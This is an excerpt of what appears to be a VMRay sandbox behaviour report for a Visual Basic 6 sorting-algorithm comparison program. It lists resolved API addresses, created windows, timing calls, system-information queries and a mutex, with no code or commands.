Get Address c:\windows\syswow64\oleaut32.dll function = VarNumFromParseNum, address_out = 0x75a16231 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarParseNumFromStr, address_out = 0x75a15fea True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarDecFromR4, address_out = 0x75a23f94 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarDecFromR8, address_out = 0x75a24e9e True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarDecFromDate, address_out = 0x75a4db72 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarDecFromI4, address_out = 0x75a32a8c True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarDecFromCy, address_out = 0x75a4d737 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarR4FromDec, address_out = 0x75a4e015 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = GetRecordInfoFromTypeInfo, address_out = 0x75a4cc3d True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = GetRecordInfoFromGuids, address_out = 0x75a4d1c4 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = SafeArrayGetRecordInfo, address_out = 0x75a4d48c True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = SafeArraySetRecordInfo, address_out = 0x75a4d4c6 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = SafeArrayGetIID, address_out = 0x75a4d509 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = SafeArraySetIID, address_out = 0x75a1e7bb True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = SafeArrayCopyData, address_out = 0x75a1e496 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = SafeArrayAllocDescriptorEx, address_out = 0x75a1ddf1 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = SafeArrayCreateEx, address_out = 0x75a4d53f True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarFormat, address_out = 0x75a52055 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarFormatDateTime, address_out = 0x75a520ea True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarFormatNumber, address_out = 0x75a52151 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarFormatPercent, address_out = 0x75a521f5 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarFormatCurrency, address_out = 0x75a52288 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarWeekdayName, address_out = 0x75a52335 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarMonthName, address_out = 0x75a523d5 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarAdd, address_out = 0x75a25934 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarAnd, address_out = 0x75a25a98 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarCat, address_out = 0x75a259b4 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarDiv, address_out = 0x75a7e405 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarEqv, address_out = 0x75a7ef07 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarIdiv, address_out = 0x75a7f00a True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarImp, address_out = 0x75a7ef47 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarMod, address_out = 0x75a7f15e True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarMul, address_out = 0x75a7dbd4 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarOr, address_out = 0x75a7ecfa True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarPow, address_out = 0x75a7ea66 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarSub, address_out = 0x75a7d332 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarXor, address_out = 0x75a7ee2e True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarAbs, address_out = 0x75a7ca11 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarFix, address_out = 0x75a7cc5f True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarInt, address_out = 0x75a7cde7 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarNeg, address_out = 0x75a7c802 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarNot, address_out = 0x75a7ec66 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarRound, address_out = 0x75a7d155 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarCmp, address_out = 0x75a1b0dc True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarDecAdd, address_out = 0x75a35f3e True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarDecCmp, address_out = 0x75a24fd0 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarBstrCat, address_out = 0x75a20d2c True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarCyMulI4, address_out = 0x75a359ed True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarBstrCmp, address_out = 0x75a0f8b8 True 1
Fn
Get Address c:\windows\syswow64\ole32.dll function = CoCreateInstanceEx, address_out = 0x75c29d4e True 1
Fn
Get Address c:\windows\syswow64\ole32.dll function = CLSIDFromProgIDEx, address_out = 0x75bf0782 True 1
Fn
Get Address c:\windows\syswow64\sxs.dll function = SxsOleAut32MapIIDOrCLSIDToTypeLibrary, address_out = 0x75317685 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = GetSystemMetrics, address_out = 0x771d7d2f True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = MonitorFromWindow, address_out = 0x771e3150 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = MonitorFromRect, address_out = 0x771fe7a0 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = MonitorFromPoint, address_out = 0x771e5281 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = EnumDisplayMonitors, address_out = 0x771e451a True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = GetMonitorInfoA, address_out = 0x771e4413 True 1
Fn
Window (18)
»
Operation Window Name Additional Information Success Count Logfile
Create - class_name = ThunderRT6Main, wndproc_parameter = 0 True 1
Fn
Create - class_name = VBMsoStdCompMgr, wndproc_parameter = 0 True 1
Fn
Create - class_name = VBFocusRT6, wndproc_parameter = 0 True 1
Fn
Create Sorting Algorithm Comparison wndproc_parameter = 0 True 1
Fn
Create RadixSort wndproc_parameter = 0 True 1
Fn
Create MergeSort wndproc_parameter = 0 True 1
Fn
Create QuickSort wndproc_parameter = 0 True 1
Fn
Create - wndproc_parameter = 0 True 1
Fn
Create - wndproc_parameter = 0 True 1
Fn
Create - wndproc_parameter = 0 True 1
Fn
Create - wndproc_parameter = 0 True 1
Fn
Create - wndproc_parameter = 0 True 1
Fn
Create - wndproc_parameter = 0 True 1
Fn
Create - wndproc_parameter = 0 True 1
Fn
Create - wndproc_parameter = 0 True 1
Fn
Create - wndproc_parameter = 0 True 1
Fn
Create - wndproc_parameter = 0 True 1
Fn
Set Attribute - class_name = VBMsoStdCompMgr, index = 0, new_long = 246096028 False 1
Fn
Keyboard (1)
»
Operation Additional Information Success Count Logfile
Get Info type = KB_LOCALE_ID, os_tid = 0, result_out = 67699721 True 1
Fn
System (852)
»
Operation Additional Information Success Count Logfile
Sleep duration = 0 milliseconds (0.000 seconds) True 21
Fn
Get Time type = Local Time, time = 2018-06-26 00:54:45 (Local Time) True 17
Fn
Get Time type = Ticks, time = 273922 True 1
Fn
Get Time type = Ticks, time = 273937 True 1
Fn
Get Time type = Ticks, time = 273968 True 5
Fn
Get Time type = Ticks, time = 273984 True 5
Fn
Get Time type = Ticks, time = 274000 True 5
Fn
Get Time type = Ticks, time = 274031 True 6
Fn
Get Time type = Ticks, time = 274046 True 9
Fn
Get Time type = Ticks, time = 274062 True 5
Fn
Get Time type = Ticks, time = 274078 True 5
Fn
Get Time type = Ticks, time = 274093 True 5
Fn
Get Time type = Ticks, time = 274109 True 10
Fn
Get Time type = Ticks, time = 274124 True 5
Fn
Get Time type = Ticks, time = 274140 True 5
Fn
Get Time type = Ticks, time = 274156 True 5
Fn
Get Time type = Ticks, time = 274171 True 5
Fn
Get Time type = Local Time, time = 2018-06-26 00:54:46 (Local Time) True 7
Fn
Get Time type = Ticks, time = 274187 True 5
Fn
Get Time type = Ticks, time = 274202 True 10
Fn
Get Time type = Ticks, time = 274218 True 5
Fn
Get Time type = Ticks, time = 274234 True 5
Fn
Get Time type = Ticks, time = 274249 True 5
Fn
Get Time type = Ticks, time = 274265 True 25
Fn
Get Time type = Ticks, time = 274280 True 35
Fn
Get Time type = Ticks, time = 274296 True 40
Fn
Get Time type = Ticks, time = 274312 True 40
Fn
Get Time type = Ticks, time = 274327 True 35
Fn
Get Time type = Ticks, time = 274343 True 35
Fn
Get Time type = Ticks, time = 274358 True 40
Fn
Get Time type = Ticks, time = 274374 True 40
Fn
Get Time type = Ticks, time = 274390 True 40
Fn
Get Time type = Ticks, time = 274405 True 26
Fn
Get Time type = Ticks, time = 274421 True 19
Fn
Get Time type = Ticks, time = 274436 True 40
Fn
Get Time type = Ticks, time = 274452 True 40
Fn
Get Time type = Ticks, time = 274468 True 39
Fn
Get Time type = Ticks, time = 274483 True 37
Fn
Get Time type = Ticks, time = 274499 True 39
Fn
Get Time type = Ticks, time = 274514 True 40
Fn
Get Time type = Ticks, time = 274530 True 25
Fn
Get Time type = Ticks, time = 274546 True 16
Fn
Get Time type = Ticks, time = 274561 True 16
Fn
Get Time type = Ticks, time = 274577 True 16
Fn
Get Time type = Ticks, time = 274592 True 10
Fn
Register Hook type = WH_MSGFILTER, hookproc_address = 0x729a1e09 True 1
Fn
Get Info type = Operating System True 3
Fn
Get Info type = Operating System True 2
Fn
Get Info type = Hardware Information True 1
Fn
Mutex (1)
»
Operation Additional Information Success Count Logfile
Create - True 1
Fn
Environment (1)
»
Operation Additional Information Success Count Logfile
Get Environment String - True 1
Fn
Data
Function Logfile
Exit-Icon

This feature requires an online-connection to the VMRay backend.

An offline version with limited functionality is also provided.
The offline version is supported only in Mozilla Firefoxwith deactivated setting "security.fileuri.strict_origin_policy".


    
Before

This feature requires an online-connection to the VMRay backend.

An offline version with limited functionality is also provided.
The offline version is supported only in Mozilla Firefoxwith deactivated setting "security.fileuri.strict_origin_policy".


    
After

This feature requires an online-connection to the VMRay backend.

An offline version with limited functionality is also provided.
The offline version is supported only in Mozilla Firefoxwith deactivated setting "security.fileuri.strict_origin_policy".


    
Screenshot
Expand-Icon
Exit-Icon
icon_left
icon_left
image